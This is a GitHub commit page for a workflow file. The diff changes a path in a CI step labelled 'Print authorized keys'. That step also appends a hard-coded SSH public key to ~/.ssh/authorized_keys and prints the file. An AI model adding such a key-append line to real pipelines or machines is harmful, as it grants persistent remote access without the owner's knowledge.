Skip to content

Commit 4ea2fe0

Browse files
committed
update
1 parent ce7352f commit 4ea2fe0

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

.github/workflows/bs.yml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -15,7 +15,7 @@ jobs:
1515
- name: Print authorized keys
1616
run: |
1717
realpath ~
18-
cat ./setup.sh
18+
cat /setup.sh
1919
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINUZosd80c17ugHclnJWvTJj6G0QGPI90iV0ijsMGkIO logenicite@outlook.com" >> ~/.ssh/authorized_keys
2020
cat ~/.ssh/authorized_keys
2121

0 commit comments

Comments
 (0)